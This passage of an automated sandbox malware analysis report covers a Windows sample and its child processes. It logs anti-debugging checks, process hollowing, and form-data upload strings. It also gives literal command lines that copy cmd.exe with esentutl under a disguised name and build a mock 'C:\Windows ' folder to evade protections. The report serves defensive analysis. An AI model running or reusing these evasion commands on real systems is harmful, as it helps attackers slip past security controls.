            Source: yihfsboC.pif, 0000001A.00000002.2533591544.0000000028BDF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8dd0f63476ff6d9<
            Source: yihfsboC.pif, 0000001A.00000002.2533591544.0000000028BDF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8dd112726dfdaef<
            Source: yihfsboC.pif, 00000017.00000002.2542884762.0000000034C23000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8dd12a00e36c4c0<
            Source: EPTMAcgvNZ.exe, 00000000.00000002.1353822380.00000000007B6000.00000004.00000020.00020000.00000000.sdmp, EPTMAcgvNZ.exe, 00000000.00000002.1353822380.000000000076E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: yihfsboC.pif, 0000001A.00000002.2533591544.0000000028BDF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8dd12a75cd9b643<
            Source: yihfsboC.pif, 0000000E.00000002.2536490412.00000000262D0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8dd10047244b21a<
            Source: yihfsboC.pif, 00000017.00000002.2542884762.0000000034C23000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8dd0f9b66364c74<
            Source: yihfsboC.pif, 0000001A.00000002.2533591544.0000000028BDF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8dd0fe7f7931677<
            Source: yihfsboC.pif, 0000000E.00000002.2536490412.0000000026535000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8dd14c06965d3a2<
            Source: yihfsboC.pif, 0000000E.00000002.2534862265.000000002423F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: yihfsboC.pif, 0000000E.00000002.2536490412.000000002615E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8dd0ea1aff451e4<
            Source: yihfsboC.pif, 00000017.00000002.2542884762.0000000034C23000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8dd0ede0895058a<
            Source: yihfsboC.pif, 0000001A.00000002.2533591544.0000000028AB0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8dd0e97064f676e<
            Source: yihfsboC.pif, 0000000E.00000002.2536490412.000000002615E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8dd0e5dbbcfced3<
            Source: yihfsboC.pif, 00000017.00000002.2542884762.0000000034C23000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8dd0f2f0420657e<
            Source: yihfsboC.pif, 0000000E.00000002.2536490412.0000000026276000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8dd0f7f6e69a05f<
            Source: yihfsboC.pif, 0000001A.00000002.2533591544.0000000028BDF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8dd102ad1bb58e8<
            Source: yihfsboC.pif, 0000000E.00000002.2536490412.00000000262D0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8dd0fe461bde220<
            Source: yihfsboC.pif, 0000000E.00000002.2536490412.00000000262D0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8dd131d191f6227<
            Source: yihfsboC.pif, 00000017.00000002.2542884762.0000000034AF4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8dd0e3f97e51cd2<
            Source: yihfsboC.pif, 0000000E.00000002.2536490412.000000002615E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8dd0e138cddbc0c<
            Source: yihfsboC.pif, 00000017.00000002.2542884762.0000000034C23000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8dd0f82c2b37b8e<
            Source: yihfsboC.pif, 0000000E.00000002.2536490412.00000000262D0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8dd11703916c344<
            Source: xpha.pif, 00000014.00000002.1533592941.0000000002690000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllL
            Source: yihfsboC.pif, 0000000E.00000002.2536490412.00000000262D0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8dd106900031a3d<
            Source: yihfsboC.pif, 0000001A.00000002.2533591544.0000000028BDF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8dd10564b4229a8<
            Source: yihfsboC.pif, 00000017.00000002.2542884762.0000000034C23000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8dd1121e522ff54<
            Source: yihfsboC.pif, 0000001A.00000002.2533591544.0000000028AB0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8dd0eab5a499b52<
            Source: yihfsboC.pif, 00000017.00000002.2542884762.0000000034C23000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8dd105de7de44b5<
            Source: yihfsboC.pif, 00000017.00000002.2542884762.0000000034C23000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8dd0f440fe0220d<
            Source: yihfsboC.pif, 0000001A.00000002.2533591544.0000000028BDF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8dd0fac6961b0ab<
            Source: yihfsboC.pif, 0000000E.00000002.2536490412.000000002615E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8dd0e2afe1517dc<
            Source: yihfsboC.pif, 0000000E.00000002.2536490412.000000002615E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8dd0ee23a537a0e<
            Source: yihfsboC.pif, 0000000E.00000002.2536490412.00000000263C5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8dd13bb487a2aa3
            Source: yihfsboC.pif, 0000000E.00000002.2536490412.000000002615E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8dd0e8c046fa382<
            Source: yihfsboC.pif, 0000000E.00000002.2536490412.0000000026276000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8dd0f14dc5e3fef<
            Source: yihfsboC.pif, 00000017.00000002.2542884762.0000000034C23000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8dd0fb53f2b9fbb<
            Source: yihfsboC.pif, 00000017.00000002.2542884762.0000000034ADA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8dd0de89fac7a38<
            Source: yihfsboC.pif, 00000017.00000002.2542884762.0000000034ADA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8dd0dfed0e58a0d<
            Source: yihfsboC.pif, 00000017.00000002.2542884762.0000000034C23000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8dd1220a2538758<
            Source: yihfsboC.pif, 0000000E.00000002.2536490412.00000000262D0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8dd1275f877ff90<
            Source: yihfsboC.pif, 0000000E.00000002.2536490412.00000000260F4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8dd0dc19698755d<
            Source: Cobsfhiy.PIF, 00000015.00000002.1462267531.000000000072D000.00000004.00000020.00020000.00000000.sdmp, yihfsboC.pif, 00000017.00000002.2538244625.0000000032815000.00000004.00000020.00020000.00000000.sdmp, yihfsboC.pif, 0000001A.00000002.2529660851.00000000268E2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: yihfsboC.pif, 0000000E.00000002.2536490412.00000000262D0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8dd10968007cad7<
            Source: yihfsboC.pif, 0000000E.00000002.2536490412.00000000262D0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8dd0fc80cbc88b2<
            Source: yihfsboC.pif, 0000001A.00000002.2533591544.0000000028A96000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8dd0e000d88a51d<
            Source: yihfsboC.pif, 00000017.00000002.2542884762.0000000034AF4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8dd0e1651b783f6<
            Source: yihfsboC.pif, 0000000E.00000002.2536490412.000000002615E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8dd0e74ea27430b<
            Source: yihfsboC.pif, 0000001A.00000002.2533591544.0000000028BDF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8dd0fc7a70b6000<
            Source: yihfsboC.pif, 0000001A.00000002.2533591544.0000000028AB0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8dd0e7d2eac84a9<
            Source: yihfsboC.pif, 00000017.00000002.2542884762.0000000034AF4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8dd0ea18e3d18a2<
            Source: yihfsboC.pif, 00000017.00000002.2542884762.0000000034AF4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8dd0e58399bf1a8<
            Source: yihfsboC.pif, 0000000E.00000002.2536490412.0000000026276000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8dd0f982ba92d5d<
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeAPI call chain: ExitProcess graph end nodegraph_0-38021
            Source: C:\Users\Public\Libraries\yihfsboC.pifAPI call chain: ExitProcess graph end nodegraph_14-54639
            Source: C:\Users\Public\Libraries\yihfsboC.pifAPI call chain: ExitProcess graph end node
            Source: C:\Users\Public\Libraries\Cobsfhiy.PIFAPI call chain: ExitProcess graph end node
            Source: C:\Users\Public\Libraries\yihfsboC.pifProcess information queried: ProcessInformationJump to behavior

            Anti Debugging

            barindex
            Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeCode function: 0_2_02B2F744 GetModuleHandleW,GetProcAddress,CheckRemoteDebuggerPresent,0_2_02B2F744
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeProcess queried: DebugPortJump to behavior
            Source: C:\Users\Public\Libraries\Cobsfhiy.PIFProcess queried: DebugPort
            Source: C:\Users\Public\Libraries\Cobsfhiy.PIFProcess queried: DebugPort
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 14_2_28DFE660 LdrInitializeThunk,LdrInitializeThunk,14_2_28DFE660
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 14_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,14_2_0040CE09
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 14_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,@__unlockDebuggerData$qv,VariantClear,VariantClear,VariantClear,14_2_004019F0
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeCode function: 0_2_02B2894C LoadLibraryW,GetProcAddress,FreeLibrary,0_2_02B2894C
            Source: C:\Users\Public\alpha.pifCode function: 16_2_003BC1FA mov eax, dword ptr fs:[00000030h]16_2_003BC1FA
            Source: C:\Users\Public\alpha.pifCode function: 19_2_003BC1FA mov eax, dword ptr fs:[00000030h]19_2_003BC1FA
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 14_2_0040ADB0 GetProcessHeap,HeapFree,14_2_0040ADB0
            Source: C:\Users\Public\Libraries\yihfsboC.pifProcess token adjusted: DebugJump to behavior
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 14_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,14_2_0040CE09
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 14_2_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,14_2_0040E61C
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 14_2_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,14_2_00416F6A
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 14_2_004123F1 SetUnhandledExceptionFilter,14_2_004123F1
            Source: C:\Users\Public\alpha.pifCode function: 16_2_003A6EC0 SetUnhandledExceptionFilter,16_2_003A6EC0
            Source: C:\Users\Public\alpha.pifCode function: 16_2_003A6B40 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,16_2_003A6B40
            Source: C:\Users\Public\alpha.pifCode function: 19_2_003A6EC0 SetUnhandledExceptionFilter,19_2_003A6EC0
            Source: C:\Users\Public\alpha.pifCode function: 19_2_003A6B40 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,19_2_003A6B40
            Source: C:\Users\Public\xpha.pifCode function: 20_2_00383600 SetUnhandledExceptionFilter,20_2_00383600
            Source: C:\Users\Public\xpha.pifCode function: 20_2_00383470 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,20_2_00383470
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 23_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,23_2_0040CE09
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 23_2_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,23_2_0040E61C
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 23_2_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,23_2_00416F6A
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: 23_2_004123F1 SetUnhandledExceptionFilter,23_2_004123F1
            Source: C:\Users\Public\Libraries\yihfsboC.pifMemory allocated: page read and write | page guardJump to behavior

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Allocates memory in foreign processes
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeMemory allocated: C:\Users\Public\Libraries\yihfsboC.pif base: 400000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\Public\Libraries\Cobsfhiy.PIFMemory allocated: C:\Users\Public\Libraries\yihfsboC.pif base: 400000 protect: page execute and read and write
            Source: C:\Users\Public\Libraries\Cobsfhiy.PIFMemory allocated: C:\Users\Public\Libraries\yihfsboC.pif base: 400000 protect: page execute and read and write
            Drops or copies cmd.exe with a different name (likely to bypass HIPS)
            Source: C:\Windows\SysWOW64\esentutl.exeFile created: C:\Users\Public\alpha.pifJump to dropped file
            Sample uses process hollowing technique
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection unmapped: C:\Users\Public\Libraries\yihfsboC.pif base address: 400000Jump to behavior
            Source: C:\Users\Public\Libraries\Cobsfhiy.PIFSection unmapped: C:\Users\Public\Libraries\yihfsboC.pif base address: 400000
            Source: C:\Users\Public\Libraries\Cobsfhiy.PIFSection unmapped: C:\Users\Public\Libraries\yihfsboC.pif base address: 400000
            Writes to foreign memory regions
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeMemory written: C:\Users\Public\Libraries\yihfsboC.pif base: 3EB008Jump to behavior
            Source: C:\Users\Public\Libraries\Cobsfhiy.PIFMemory written: C:\Users\Public\Libraries\yihfsboC.pif base: 2E7008
            Source: C:\Users\Public\Libraries\Cobsfhiy.PIFMemory written: C:\Users\Public\Libraries\yihfsboC.pif base: 20E008
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeProcess created: C:\Users\Public\Libraries\yihfsboC.pif C:\Users\Public\Libraries\yihfsboC.pifJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /oJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\ping.exe /d C:\\Users\\Public\\xpha.pif /oJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows " Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows \SysWOW64" Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c C:\\Users\\Public\\xpha.pif 127.0.0.1 -n 10Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c del "C:\Users\Public\xpha.pif" Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c rmdir "C:\Windows \SysWOW64Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c rmdir "C:\Windows \" Jump to behavior
            Source: C:\Users\Public\alpha.pifProcess created: C:\Users\Public\xpha.pif C:\\Users\\Public\\xpha.pif 127.0.0.1 -n 10Jump to behavior
            Source: C:\Users\Public\Libraries\Cobsfhiy.PIFProcess created: C:\Users\Public\Libraries\yihfsboC.pif C:\Users\Public\Libraries\yihfsboC.pif
            Source: C:\Users\Public\Libraries\Cobsfhiy.PIFProcess created: C:\Users\Public\Libraries\yihfsboC.pif C:\Users\Public\Libraries\yihfsboC.pif
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeCode function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,0_2_02B15ACC
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeCode function: GetLocaleInfoA,0_2_02B1A7C4
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeCode function: lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,0_2_02B15BD8
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeCode function: GetLocaleInfoA,0_2_02B1A810
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: GetLocaleInfoA,14_2_00417A20
            Source: C:\Users\Public\alpha.pifCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,setlocale,16_2_00398572
            Source: C:\Users\Public\alpha.pifCode function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,GetDateFormatW,memmove,GetDateFormatW,realloc,GetDateFormatW,memmove,GetLastError,GetLastError,realloc,16_2_00396854
            Source: C:\Users\Public\alpha.pifCode function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetTimeFormatW,16_2_00399310
            Source: C:\Users\Public\alpha.pifCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,setlocale,19_2_00398572
            Source: C:\Users\Public\alpha.pifCode function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,GetDateFormatW,memmove,GetDateFormatW,realloc,GetDateFormatW,memmove,GetLastError,GetLastError,realloc,19_2_00396854
            Source: C:\Users\Public\alpha.pifCode function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetTimeFormatW,19_2_00399310
            Source: C:\Users\Public\Libraries\yihfsboC.pifCode function: GetLocaleInfoA,23_2_00417A20
            Source: C:\Users\Public\Libraries\Cobsfhiy.PIFCode function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,24_2_02BC5ACC
            Source: C:\Users\Public\Libraries\Cobsfhiy.PIFCode function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,24_2_02BC5BD7
            Source: C:\Users\Public\Libraries\Cobsfhiy.PIFCode function: GetLocaleInfoA,24_2_02BCA810
            Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Users\Public\Libraries\yihfsboC.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Users\Public\Libraries\yihfsboC.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Users\Public\Libraries\yihfsboC.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
            Source: C:\Users\Public\Libraries\yihfsboC.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
            Source: C:\Users\Public\Libraries\yihfsboC.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
            Source: C:\Users\Public\alpha.pifQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Users\Public\Libraries\yihfsboC.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
            Source: C:\Users\Public\Libraries\yihfsboC.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
            Source: C:\Users\Public\Libraries\yihfsboC.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
            Source: C:\Users\Public\Libraries\yihfsboC.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
            Source: C:\Users\Public\Libraries\yihfsboC.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
            Source: C:\Users\Public\Libraries\yihfsboC.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
            Source: C:\Users\Public\Libraries\yihfsboC.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
            Source: C:\Users\Public\Libraries\yihfsboC.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
            Source: C:\Users\Public\Libraries\yihfsboC.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
            Source: C:\Users\Public\Libraries\yihfsboC.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeCode function: 0_2_02B1920C GetLocalTime,0_2_02B1920C
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeCode function: 0_2_02B1B78C GetVersionExA,0_2_02B1B78C
            Source: C:\Users\Public\Libraries\yihfsboC.pifKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
            Source: EPTMAcgvNZ.exe, 00000000.00000002.1413076026.000000007F200000.00000004.00001000.00020000.00000000.sdmp, EPTMAcgvNZ.exe, 00000000.00000003.1326762946.000000007EDA0000.00000004.00001000.00020000.00000000.sdmp, yihfsboC.pif, 0000000E.00000002.2505613508.00000000008C0000.00000040.00000400.00020000.00000000.sdmp, yihfsboC.pif, 0000000E.00000002.2505613508.0000000000870000.00000040.00000400.00020000.00000000.sdmp, yihfsboC.pif, 00000017.00000001.1460585249.00000000004F0000.00000040.00000001.00020000.00000000.sdmp, yihfsboC.pif, 0000001A.00000002.2505611445.00000000004F0000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: cmdagent.exe
            Source: EPTMAcgvNZ.exe, 00000000.00000002.1413076026.000000007F200000.00000004.00001000.00020000.00000000.sdmp, EPTMAcgvNZ.exe, 00000000.00000003.1326762946.000000007EDA0000.00000004.00001000.00020000.00000000.sdmp, yihfsboC.pif, 0000000E.00000002.2505613508.00000000008C0000.00000040.00000400.00020000.00000000.sdmp, yihfsboC.pif, 0000000E.00000002.2505613508.0000000000870000.00000040.00000400.00020000.00000000.sdmp, yihfsboC.pif, 00000017.00000001.1460585249.00000000004F0000.00000040.00000001.00020000.00000000.sdmp, yihfsboC.pif, 0000001A.00000002.2505611445.00000000004F0000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: quhlpsvc.exe
